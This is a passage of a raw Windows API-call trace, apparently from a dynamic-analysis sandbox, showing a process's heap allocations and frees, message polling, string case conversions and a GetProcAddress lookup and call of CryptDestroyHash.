hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.145] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.145] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.145] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.145] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.146] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0253.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0253.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.148] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.148] CryptDestroyHash (hHash=0xaa5920) returned 1 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree 